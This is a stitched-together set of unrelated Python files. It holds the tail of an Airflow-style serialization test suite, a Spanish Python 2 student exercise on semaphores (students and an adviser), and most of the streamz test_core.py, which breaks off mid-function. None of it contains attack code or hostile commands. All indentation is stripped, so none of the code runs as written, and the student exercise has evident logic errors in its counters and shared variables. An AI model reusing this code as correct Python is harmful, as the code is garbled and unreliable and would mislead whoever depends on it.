expected_deserialized = SerializedBaseOperator.deserialize_operator(expected_serialized)
expected_dict = SerializedBaseOperator.serialize_operator(expected_deserialized)
assert node
assert SerializedBaseOperator.serialize_operator(node) == expected_dict
return
for child in children:
check_task_group(child)
check_task_group(serialized_dag.task_group)
@parameterized.expand(
[
("poke", False),
("reschedule", True),
]
)
def test_serialize_sensor(self, mode, expect_custom_deps):
from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
def test_serialize_event_handler(self):
from airflow.operators.dummy import DummyOperator
from airflow.contrib.jobs.event_handlers import StartEventHandler
from notification_service.base_notification import BaseEvent
from airflow.executors.scheduling_action import SchedulingAction
event = BaseEvent(key='k', value='v')
op = DummyOperator(task_id='dummy', event_handler=StartEventHandler())
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_event_handler()
assert type(event_handler) == StartEventHandler
assert event_handler.handle_event(event, None)[0] == SchedulingAction.START
op = DummyOperator(task_id='dummy')
encoded_op = SerializedBaseOperator.serialize_operator(op)
deserialized_op = SerializedBaseOperator.deserialize_operator(encoded_op)
event_handler = deserialized_op.get_event_handler()
assert event_handler is None
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
alumnoyasesor.py
|
'Macario Falcon Leonel'
'Ejercicios de Sincronizacion'
'Problema: Los alumnos y el asesor'
'Puede haber hasta 5 alumnos en una misma asesoria'
'Sopora hasta 2 preguntas por alumno'
import threading
import time
import random
alumnos = 0
auxiliarPreguntas = 0
turno = 0
dicAlu = {}
hilos_alum = 1#no hay 0 alumnos
mutex = threading.Semaphore(1)
mano = threading.Semaphore(1)
cubiculo_vacio = threading.Semaphore(1)
torniquete = threading.Semaphore(1)
#Asesoria al alumno
def asesoria(num):
print "Asesorando al alumno %d\n" % num
time.sleep(1.2)
#Alumno pregunta
def duda(num,preguntasMax):
print "El %d alumno pregunta por %da vez" % (num,preguntasMax)
print "El %d alumno ya termino de preguntar" % num
time.sleep(1.3)
asesoria(num)
#Reinicia contador de hilos
def Profesor():
global hilos_alum
cubiculo_vacio.acquire()
print "--->Sala vacia, Sieta del profesor en proceso<---\n"
hilos_alum = 1
time.sleep(1.0)
cubiculo_vacio.release()
def alumno(num):
global alumnos
print "El %d alumno tocar la puerta y entra" % num
mutex.acquire()
dicAlu[str(unichr(num+48))] = 0
mutex.release()
torniquete.acquire()
torniquete.release()
turno = 0
while ((dicAlu[str(unichr(num+48))] != 2) and (turno < 2)):
mano.acquire()
mutex.acquire()
alumnos = alumnos + 1
if alumnos == 1:
cubiculo_vacio.acquire()
auxiliarPreguntas = dicAlu[str(unichr(num+48))]
auxiliarPreguntas += 1
dicAlu[str(unichr(num+48))] = auxiliarPreguntas
duda(num, auxiliarPreguntas)
mutex.release()
mano.release()
time.sleep(0.3)
mutex.acquire()
turno += 1
if dicAlu[str(unichr(num+48))] == 2:
alumnos -=2
if alumnos == 0:
cubiculo_vacio.release()
Profesor()
mutex.release()
time.sleep(0.2)
while True:
#contado de hilos
while (hilos_alum < 6):
time.sleep(0.05)
if random.random() < 0.05:
threading.Thread(target=alumno, args=[hilos_alum]).start()
hilos_alum += 1
|
test_core.py
|
from datetime import timedelta
from functools import partial
import itertools
import json
import operator
from operator import add
import os
from time import time, sleep
import sys
import pytest
from tornado import gen
from tornado.queues import Queue
from tornado.ioloop import IOLoop
import streamz as sz
from streamz import Stream, RefCounter
from streamz.sources import sink_to_file, PeriodicCallback
from streamz.utils_test import (inc, double, gen_test, tmpfile, captured_logger, # noqa: F401
clean, await_for, metadata) # noqa: F401
from distributed.utils_test import loop # noqa: F401
def test_basic():
source = Stream()
b1 = source.map(inc)
b2 = source.map(double)
c = b1.scan(add)
Lc = c.sink_to_list()
Lb = b2.sink_to_list()
for i in range(4):
source.emit(i)
assert Lc == [1, 3, 6, 10]
assert Lb == [0, 2, 4, 6]
def test_no_output():
source = Stream()
assert source.emit(1) is None
def test_scan():
source = Stream()
def f(acc, i):
acc = acc + i
return acc, acc
L = source.scan(f, returns_state=True).sink_to_list()
for i in range(3):
source.emit(i)
assert L == [0, 1, 3]
def test_kwargs():
source = Stream()
def f(acc, x, y=None):
acc = acc + x + y
return acc
L = source.scan(f, y=10).sink_to_list()
for i in range(3):
source.emit(i)
assert L == [0, 11, 23]
def test_filter():
source = Stream()
L = source.filter(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_args():
source = Stream()
L = source.filter(lambda x, n: x % n == 0, 2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_kwargs():
source = Stream()
L = source.filter(lambda x, n=1: x % n == 0, n=2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [0, 2, 4, 6, 8]
def test_filter_none():
source = Stream()
L = source.filter(None).sink_to_list()
for i in range(10):
source.emit(i % 3)
assert L == [1, 2, 1, 2, 1, 2]
def test_map():
def add(x=0, y=0):
return x + y
source = Stream()
L = source.map(add, y=10).sink_to_list()
source.emit(1)
assert L[0] == 11
def test_map_args():
source = Stream()
L = source.map(operator.add, 10).sink_to_list()
source.emit(1)
assert L == [11]
def test_starmap():
def add(x=0, y=0):
return x + y
source = Stream()
L = source.starmap(add).sink_to_list()
source.emit((1, 10))
assert L[0] == 11
def test_remove():
source = Stream()
L = source.remove(lambda x: x % 2 == 0).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [1, 3, 5, 7, 9]
def test_partition():
source = Stream()
L = source.partition(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (2, 3), (4, 5), (6, 7), (8, 9)]
def test_partition_timeout():
source = Stream()
L = source.partition(10, timeout=0.01).sink_to_list()
for i in range(5):
source.emit(i)
sleep(0.1)
assert L == [(0, 1, 2, 3, 4)]
def test_partition_timeout_cancel():
source = Stream()
L = source.partition(3, timeout=0.1).sink_to_list()
for i in range(3):
source.emit(i)
sleep(0.09)
source.emit(3)
sleep(0.02)
assert L == [(0, 1, 2)]
sleep(0.09)
assert L == [(0, 1, 2), (3,)]
def test_partition_key():
source = Stream()
L = source.partition(2, key=0).sink_to_list()
for i in range(4):
source.emit((i % 2, i))
assert L == [((0, 0), (0, 2)), ((1, 1), (1, 3))]
def test_partition_key_callable():
source = Stream()
L = source.partition(2, key=lambda x: x % 2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 2), (1, 3), (4, 6), (5, 7)]
def test_partition_size_one():
source = Stream()
source.partition(1, timeout=.01).sink(lambda x: None)
for i in range(10):
source.emit(i)
def test_sliding_window():
source = Stream()
L = source.sliding_window(2).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, ), (0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
(5, 6), (6, 7), (7, 8), (8, 9)]
L = source.sliding_window(2, return_partial=False).sink_to_list()
for i in range(10):
source.emit(i)
assert L == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5),
(5, 6), (6, 7), (7, 8), (8, 9)]
def test_sliding_window_ref_counts():
source = Stream()
_ = source.sliding_window(2)
r_prev = RefCounter()
source.emit(-2)
source.emit(-1, metadata=[{'ref': r_prev}])
for i in range(10):
r = RefCounter()
assert r_prev.count == 1
source.emit(i, metadata=[{'ref': r}])
assert r_prev.count == 0
assert r.count == 1
r_prev = r
def test_sliding_window_metadata():
source = Stream()
L = metadata(source.sliding_window(2)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
assert L == [
[{'v': 1}], # First emit, because 0 has no metadata
[{'v': 1}, {'v': 2}], # Second emit
[{'v': 2}, {'v': 3}] # Third emit
]
@gen_test()
def test_backpressure():
q = Queue(maxsize=2)
source = Stream(asynchronous=True)
source.map(inc).scan(add, start=0).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
end = time()
assert end - start >= 0.2
@gen_test()
def test_timed_window():
source = Stream(asynchronous=True)
a = source.timed_window(0.01)
assert a.loop is IOLoop.current()
L = a.sink_to_list()
for i in range(10):
yield source.emit(i)
yield gen.sleep(0.004)
yield gen.sleep(a.interval)
assert L
assert sum(L, []) == list(range(10))
assert all(len(x) <= 3 for x in L)
assert any(len(x) >= 2 for x in L)
yield gen.sleep(0.1)
assert not L[-1]
@gen_test()
def test_timed_window_ref_counts():
source = Stream()
_ = source.timed_window(0.01)
ref1 = RefCounter()
source.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
yield gen.sleep(0.05)
ref2 = RefCounter()
source.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
@gen_test()
def test_timed_window_metadata():
source = Stream()
L = metadata(source.timed_window(0.01)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
yield gen.sleep(0.1)
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
yield gen.sleep(0.1)
assert L == [
[{'v': 1}], # first emit because 0 has no metadata
[{'v': 2}, {'v': 3}] # second emit
]
def test_timed_window_timedelta(clean): # noqa: F811
pytest.importorskip('pandas')
source = Stream(asynchronous=True)
a = source.timed_window('10ms')
assert a.interval == 0.010
@gen_test()
def test_timed_window_backpressure():
q = Queue(maxsize=1)
source = Stream(asynchronous=True)
source.timed_window(0.01).sink(q.put)
@gen.coroutine
def read_from_q():
while True:
yield q.get()
yield gen.sleep(0.1)
IOLoop.current().add_callback(read_from_q)
start = time()
for i in range(5):
yield source.emit(i)
yield gen.sleep(0.01)
stop = time()
assert stop - start > 0.2
def test_sink_to_file():
with tmpfile() as fn:
source = Stream()
with sink_to_file(fn, source) as f:
source.emit('a')
source.emit('b')
with open(fn) as f:
data = f.read()
assert data == 'a\nb\n'
def test_sink_with_args_and_kwargs():
L = dict()
def mycustomsink(elem, key, prefix=""):
key = prefix + key
if key not in L:
L[key] = list()
L[key].append(elem)
s = Stream()
s.sink(mycustomsink, "cat", "super")
s.emit(1)
s.emit(2)
assert L['supercat'] == [1, 2]
@gen_test()
def test_counter():
counter = itertools.count()
source = PeriodicCallback(lambda: next(counter), 0.001, asynchronous=True)
L = source.sink_to_list()
yield gen.sleep(0.05)
assert L
@gen_test()
def test_rate_limit():
source = Stream(asynchronous=True)
L = source.rate_limit(0.05).sink_to_list()
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert stop - start > 0.2
assert len(L) == 5
@gen_test()
def test_delay():
source = Stream(asynchronous=True)
L = source.delay(0.02).sink_to_list()
for i in range(5):
yield source.emit(i)
assert not L
yield gen.sleep(0.04)
assert len(L) < 5
yield gen.sleep(0.1)
assert len(L) == 5
@gen_test()
def test_delay_ref_counts():
source = Stream(asynchronous=True)
_ = source.delay(0.01)
refs = []
for i in range(5):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
yield gen.sleep(0.05)
assert all(r.count == 0 for r in refs)
@gen_test()
def test_buffer():
source = Stream(asynchronous=True)
L = source.map(inc).buffer(10).map(inc).rate_limit(0.05).sink_to_list()
start = time()
for i in range(10):
yield source.emit(i)
stop = time()
assert stop - start < 0.01
assert not L
start = time()
for i in range(5):
yield source.emit(i)
stop = time()
assert L
assert stop - start > 0.04
@gen_test()
def test_buffer_ref_counts():
source = Stream(asynchronous=True)
_ = source.buffer(5)
refs = []
for i in range(5):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
yield gen.sleep(0.05)
assert all(r.count == 0 for r in refs)
def test_zip():
a = Stream()
b = Stream()
c = sz.zip(a, b)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
b.emit('b')
assert L == [(1, 'a'), (2, 'b')]
d = Stream()
# test zip from the object itself
# zip 3 streams together
e = a.zip(b, d)
L2 = e.sink_to_list()
a.emit(1)
b.emit(2)
d.emit(3)
assert L2 == [(1, 2, 3)]
def test_zip_literals():
a = Stream()
b = Stream()
c = sz.zip(a, 123, b)
L = c.sink_to_list()
a.emit(1)
b.emit(2)
assert L == [(1, 123, 2)]
a.emit(4)
b.emit(5)
assert L == [(1, 123, 2),
(4, 123, 5)]
def test_zip_same():
a = Stream()
b = a.zip(a)
L = b.sink_to_list()
a.emit(1)
a.emit(2)
assert L == [(1, 1), (2, 2)]
def test_combine_latest():
a = Stream()
b = Stream()
c = a.combine_latest(b)
d = a.combine_latest(b, emit_on=[a, b])
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
a.emit(3)
b.emit('b')
assert L == [(2, 'a'), (3, 'a'), (3, 'b')]
assert L2 == [(2, 'a'), (3, 'a'), (3, 'b')]
def test_combine_latest_emit_on():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_emit_on_stream():
a = Stream()
b = Stream()
c = a.combine_latest(b, emit_on=0)
L = c.sink_to_list()
a.emit(1)
b.emit('a')
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(2, 'a'), (3, 'a'), (4, 'b')]
def test_combine_latest_ref_counts():
a = Stream()
b = Stream()
_ = a.combine_latest(b)
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
# The new value kicks out the old value
ref2 = RefCounter()
a.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
# The value on stream a is still retained and the value on stream b is new
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref2.count == 1
assert ref3.count == 1
def test_combine_latest_metadata():
a = Stream()
b = Stream()
L = metadata(a.combine_latest(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
b.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # first emit when 2 is introduced
[{'v': 1}], # 3 has no metadata but it replaces the value on 'b'
[{'v': 1}, {'v': 4}] # 4 replaces the value without metadata on 'b'
]
@gen_test()
def test_zip_timeout():
a = Stream(asynchronous=True)
b = Stream(asynchronous=True)
c = sz.zip(a, b, maxsize=2)
L = c.sink_to_list()
a.emit(1)
a.emit(2)
future = a.emit(3)
with pytest.raises(gen.TimeoutError):
yield gen.with_timeout(timedelta(seconds=0.01), future)
b.emit('a')
yield future
assert L == [(1, 'a')]
def test_zip_ref_counts():
a = Stream()
b = Stream()
_ = a.zip(b)
# The first value in a becomes buffered
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
# The second value in a also becomes buffered
ref2 = RefCounter()
a.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 1
assert ref2.count == 1
# All emitted values are removed from the buffer
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref1.count == 0
assert ref2.count == 1 # still in the buffer
assert ref3.count == 0
def test_zip_metadata():
a = Stream()
b = Stream()
L = metadata(a.zip(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
a.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # first emit when 2 is introduced
[{'v': 4}] # second emit when 4 is introduced, and 3 has no metadata
]
def test_frequencies():
source = Stream()
L = source.frequencies().sink_to_list()
source.emit('a')
source.emit('b')
source.emit('a')
assert L[-1] == {'a': 2, 'b': 1}
def test_flatten():
source = Stream()
L = source.flatten().sink_to_list()
source.emit([1, 2, 3])
source.emit([4, 5])
source.emit([6, 7, 8])
assert L == [1, 2, 3, 4, 5, 6, 7, 8]
def test_unique():
source = Stream()
L = source.unique().sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
assert L == [1, 2]
def test_unique_key():
source = Stream()
L = source.unique(key=lambda x: x % 2, maxsize=1).sink_to_list()
source.emit(1)
source.emit(2)
source.emit(4)
source.emit(6)
source.emit(3)
assert L == [1, 2, 3]
def test_unique_metadata():
source = Stream()
L = metadata(source.unique()).flatten().sink_to_list()
for i in range(5):
source.emit(i, metadata=[{'v': i}])
assert L == [{'v': i} for i in range(5)]
def test_unique_history():
source = Stream()
s = source.unique(maxsize=2)
s2 = source.unique(maxsize=2, hashable=False)
L = s.sink_to_list()
L2 = s2.sink_to_list()
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
source.emit(1)
source.emit(2)
assert L == [1, 2]
assert L == L2
source.emit(3)
source.emit(2)
assert L == [1, 2, 3]
assert L == L2
source.emit(1)
assert L == [1, 2, 3, 1]
assert L == L2
# update 2 position
source.emit(2)
# knock out 1
source.emit(3)
# update 2 position
source.emit(2)
assert L == [1, 2, 3, 1, 3]
assert L == L2
def test_unique_history_dict():
source = Stream()
s = source.unique(maxsize=2, hashable=False)
L = s.sink_to_list()
a = {'hi': 'world'}
b = {'hi': 'bar'}
c = {'foo': 'bar'}
source.emit(a)
source.emit(b)
source.emit(a)
source.emit(b)
source.emit(a)
source.emit(b)
assert L == [a, b]
source.emit(c)
source.emit(b)
assert L == [a, b, c]
source.emit(a)
assert L == [a, b, c, a]
def test_union():
a = Stream()
b = Stream()
c = Stream()
L = a.union(b, c).sink_to_list()
a.emit(1)
assert L == [1]
b.emit(2)
assert L == [1, 2]
a.emit(3)
assert L == [1, 2, 3]
c.emit(4)
assert L == [1, 2, 3, 4]
def test_pluck():
a = Stream()
L = a.pluck(1).sink_to_list()
a.emit([1, 2, 3])
assert L == [2]
a.emit([4, 5, 6, 7, 8, 9])
assert L == [2, 5]
with pytest.raises(IndexError):
a.emit([1])
def test_pluck_list():
a = Stream()
L = a.pluck([0, 2]).sink_to_list()
a.emit([1, 2, 3])
assert L == [(1, 3)]
a.emit([4, 5, 6, 7, 8, 9])
assert L == [(1, 3), (4, 6)]
with pytest.raises(IndexError):
a.emit([1])
def test_collect():
source1 = Stream()
source2 = Stream()
collector = source1.collect()
L = collector.sink_to_list()
source2.sink(collector.flush)
source1.emit(1)
source1.emit(2)
assert L == []
source2.emit('anything') # flushes collector
assert L == [(1, 2)]
source2.emit('anything')
assert L == [(1, 2), ()]
source1.emit(3)
assert L == [(1, 2), ()]
source2.emit('anything')
assert L == [(1, 2), (), (3,)]
def test_collect_ref_counts():
source = Stream()
collector = source.collect()
refs = []
for i in range(10):
r = RefCounter()
refs.append(r)
source.emit(i, metadata=[{'ref': r}])
assert all(r.count == 1 for r in refs)
collector.flush()
assert all(r.count == 0 for r in refs)
def test_collect_metadata():
source = Stream()
collector = source.collect()
L = metadata(collector).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
collector.flush()
source.emit(3, metadata=[{'v': 3}])
source.emit(4, metadata=[{'v': 4}])
collector.flush()
assert L == [
[{'v': 1}, {'v': 2}], # Flush 0-2, but 0 has no metadata
[{'v': 3}, {'v': 4}] # Flush the rest
]
def test_map_str():
def add(x=0, y=0):
return x + y
source = Stream()
s = source.map(add, y=10)
assert str(s) == '<map: add>'
def test_filter_str():
def iseven(x):
return x % 2 == 0
source = Stream()
s = source.filter(iseven)
assert str(s) == '<filter: iseven>'
def test_timed_window_str(clean): # noqa: F811
source = Stream()
s = source.timed_window(.05)
assert str(s) == '<timed_window: 0.05>'
def test_partition_str():
source = Stream()
s = source.partition(2)
assert str(s) == '<partition: 2>'
def test_partition_ref_counts():
source = Stream()
_ = source.partition(2)
for i in range(10):
r = RefCounter()
source.emit(i, metadata=[{'ref': r}])
if i % 2 == 0:
assert r.count == 1
else:
assert r.count == 0
def test_partition_metadata():
source = Stream()
L = metadata(source.partition(2)).sink_to_list()
source.emit(0)
source.emit(1, metadata=[{'v': 1}])
source.emit(2, metadata=[{'v': 2}])
source.emit(3, metadata=[{'v': 3}])
assert L == [
[{'v': 1}], # first emit when 1 is introduced. 0 has no metadata
[{'v': 2}, {'v': 3}] # second emit
]
def test_stream_name_str():
source = Stream(stream_name='this is not a stream')
assert str(source) == '<this is not a stream; Stream>'
def test_zip_latest():
a = Stream()
b = Stream()
c = a.zip_latest(b)
d = a.combine_latest(b, emit_on=a)
L = c.sink_to_list()
L2 = d.sink_to_list()
a.emit(1)
a.emit(2)
b.emit('a')
b.emit('b')
a.emit(3)
assert L == [(1, 'a'), (2, 'a'), (3, 'b')]
assert L2 == [(3, 'b')]
def test_zip_latest_reverse():
a = Stream()
b = Stream()
c = a.zip_latest(b)
L = c.sink_to_list()
b.emit('a')
a.emit(1)
a.emit(2)
a.emit(3)
b.emit('b')
a.emit(4)
assert L == [(1, 'a'), (2, 'a'), (3, 'a'), (4, 'b')]
def test_triple_zip_latest():
from streamz.core import Stream
s1 = Stream()
s2 = Stream()
s3 = Stream()
s_simple = s1.zip_latest(s2, s3)
L_simple = s_simple.sink_to_list()
s1.emit(1)
s2.emit('I')
s2.emit("II")
s1.emit(2)
s2.emit("III")
s3.emit('a')
s3.emit('b')
s1.emit(3)
assert L_simple == [(1, 'III', 'a'), (2, 'III', 'a'), (3, 'III', 'b')]
def test_zip_latest_ref_counts():
a = Stream()
b = Stream()
_ = a.zip_latest(b)
ref1 = RefCounter()
a.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1 # Retained until stream b has a value
# The lossless stream is never retained if all upstreams have a value
ref2 = RefCounter()
b.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
# Kick out the stream b value and verify it has zero references
ref3 = RefCounter()
b.emit(3, metadata=[{'ref': ref3}])
assert ref2.count == 0
assert ref3.count == 1
# Verify the lossless value is not retained, but the lossy value is
ref4 = RefCounter()
a.emit(3, metadata=[{'ref': ref4}])
assert ref3.count == 1
assert ref4.count == 0
def test_zip_latest_metadata():
a = Stream()
b = Stream()
L = metadata(a.zip_latest(b)).sink_to_list()
a.emit(1, metadata=[{'v': 1}])
b.emit(2, metadata=[{'v': 2}])
a.emit(3)
b.emit(4, metadata=[{'v': 4}])
assert L == [
[{'v': 1}, {'v': 2}], # the first emit when 2 is introduced
[{'v': 2}] # 3 has no metadata
]
def test_connect():
source_downstream = Stream()
# connect assumes this default behaviour
# of stream initialization
assert not source_downstream.downstreams
assert source_downstream.upstreams == [None]
# initialize the second stream to connect to
source_upstream = Stream()
sout = source_downstream.map(lambda x : x + 1)
L = list()
sout = sout.map(L.append)
source_upstream.connect(source_downstream)
source_upstream.emit(2)
source_upstream.emit(4)
assert L == [3, 5]
def test_multi_connect():
source0 = Stream()
source1 = Stream()
source_downstream = source0.union(source1)
# connect assumes this default behaviour
# of stream initialization
assert not source_downstream.downstreams
# initialize the second stream to connect to
source_upstream = Stream()
sout = source_downstream.map(lambda x : x + 1)
L = list()
sout = sout.map(L.append)
source_upstream.connect(source_downstream)
source_upstream.emit(2)
source_upstream.emit(4)
assert L == [3, 5]
def test_disconnect():
source = Stream()
upstream = Stream()
L = upstream.sink_to_list()
source.emit(1)
assert L == []
source.connect(upstream)
source.emit(2)
source.emit(3)
assert L == [2, 3]
source.disconnect(upstream)
source.emit(4)
assert L == [2, 3]
def test_gc():
source = Stream()
L = []
a = source.map(L.append)
source.emit(1)
assert L == [1]
del a
import gc; gc.collect()
start = time()
while source.downstreams:
sleep(0.01)
assert time() < start + 1
source.emit(2)
assert L == [1]
@gen_test()
def test_from_file():
with tmpfile() as fn:
with open(fn, 'wt') as f:
f.write('{"x": 1, "y": 2}\n')
f.write('{"x": 2, "y": 2}\n')
f.write('{"x": 3, "y": 2}\n')
f.flush()
source = Stream.from_textfile(fn, poll_interval=0.010,
asynchronous=True, start=False)
L = source.map(json.loads).pluck('x').sink_to_list()
assert L == []
source.start()
yield await_for(lambda: len(L) == 3, timeout=5)
assert L == [1, 2, 3]
f.write('{"x": 4, "y": 2}\n')
f.write('{"x": 5, "y": 2}\n')
f.flush()
start = time()
while L != [1, 2, 3, 4, 5]:
yield gen.sleep(0.01)
assert time() < start + 2 # reads within 2s
@gen_test()
def test_from_file_end():
with tmpfile() as fn:
with open(fn, 'wt') as f:
f.write('data1\n')
f.flush()
source = Stream.from_textfile(fn, poll_interval=0.010,
start=False, from_end=True)
out = source.sink_to_list()
source.start()
assert out == []
yield await_for(lambda: source.started, 2, period=0.02)
f.write('data2\n')
f.flush()
yield await_for(lambda: out == ['data2\n'], timeout=5, period=0.1)
@gen_test()
def test_filenames():
with tmpfile() as fn:
os.mkdir(fn)
with open(os.path.join(fn, 'a'), 'w'):
pass
with open(os.path.join(fn, 'b'), 'w'):
pass
source = Stream.filenames(fn, asynchronous=True)
L = source.sink_to_list()
source.start()
while len(L) < 2:
yield gen.sleep(0.01)
assert L == [os.path.join(fn, x) for x in ['a', 'b']]
with open(os.path.join(fn, 'c'), 'w'):
pass
while len(L) < 3:
yield gen.sleep(0.01)
assert L == [os.path.join(fn, x) for x in ['a', 'b', 'c']]
def test_docstrings():
for s in [Stream, Stream()]:
assert 'every element' in s.map.__doc__
assert s.map.__name__ == 'map'
assert 'predicate' in s.filter.__doc__
assert s.filter.__name__ == 'filter'
def test_subclass():
class NewStream(Stream):
pass
@NewStream.register_api()
class foo(NewStream):
pass
assert hasattr(NewStream, 'map')
assert hasattr(NewStream(), 'map')
assert hasattr(NewStream, 'foo')
assert hasattr(NewStream(), 'foo')
assert not hasattr(Stream, 'foo')
assert not hasattr(Stream(), 'foo')
@gen_test()
def test_latest():
source = Stream(asynchronous=True)
L = []
@gen.coroutine
def slow_write(x):
yield gen.sleep(0.050)
L.append(x)
s = source.map(inc).latest().map(slow_write) # noqa: F841
source.emit(1)
yield gen.sleep(0.010)
source.emit(2)
source.emit(3)
start = time()
while len(L) < 2:
yield gen.sleep(0.01)
assert time() < start + 3
assert L == [2, 4]
yield gen.sleep(0.060)
assert L == [2, 4]
def test_latest_ref_counts():
source = Stream()
_ = source.latest()
ref1 = RefCounter()
source.emit(1, metadata=[{'ref': ref1}])
assert ref1.count == 1
ref2 = RefCounter()
source.emit(2, metadata=[{'ref': ref2}])
assert ref1.count == 0
assert ref2.count == 1
def test_destroy():
source = Stream()
s = source.map(inc)
L = s.sink_to_list()
source.emit(1)
assert L == [2]
s.destroy()
assert not list(source.downstreams)
assert not s.upstreams
source.emit(2)
assert L == [2]
def dont_test_stream_kwargs(clean): # noqa: F811
''' Test the good and bad kwargs for the stream
Currently just stream_name
'''
test_name = "some test name"
sin = Stream(stream_name=test_name)
sin2 = Stream()
assert sin.name == test_name
# when not defined, should be None
assert sin2.name is None
# add new core methods here, initialized
# these should be functions, use partial to partially initialize them
# (if they require more arguments)
streams = [
# some filter kwargs, so we comment them out
partial(sin.map, lambda x : x),
partial(sin.accumulate, lambda x1, x2 : x1),
partial(sin.filter, lambda x : True),
partial(sin.partition, 2),
partial(sin.sliding_window, 2),
partial(sin.timed_window, .01),
partial(sin.rate_limit, .01),
partial(sin.delay, .02),
partial(sin.buffer, 2),
partial(sin.zip, sin2),
partial(sin.combine_latest, sin2),
sin.frequencies,
sin.flatten,
sin.unique,
sin.union,
partial(sin.pluck, 0),
sin.collect,
]
good_kwargs = dict(stream_name=test_name)
bad_kwargs = dict(foo="bar")
for s in streams:
# try good kwargs
sout = s(**good_kwargs)
assert sout.name == test_name
del sout
with pytest.raises(TypeError):
sout = s(**bad_kwargs)
sin.emit(1)
# need a second emit for accumulate
sin.emit(1)
del sout
# verify that sout is properly deleted each time by emitting once into sin
# and not getting TypeError
# garbage collect and then try
import gc
gc.collect()
sin.emit(1)
@pytest.fixture
def thread(loop): # noqa: F811
from threading import Thread, Event
thread = Thread(target=loop.start)
thread.daemon = True
thread.start()
event = Event()
loop.add_callback(event.set)
event.wait()
return thread
def test_percolate_loop_information(clean): # noqa: F811
source = Stream()
assert not source.loop
s = source.timed_window(0.5)
assert source.loop is s.loop
def test_separate_thread_without_time(loop, thread): # noqa: F811
assert thread.is_alive()
source = Stream(loop=loop)
L = source.map(inc).sink_to_list()
for i in range(10):
source.emit(i)
assert L[-1] == i + 1
def test_separate_thread_with_time(clean): # noqa: F811
L = []
@gen.coroutine
def slow_write(x):
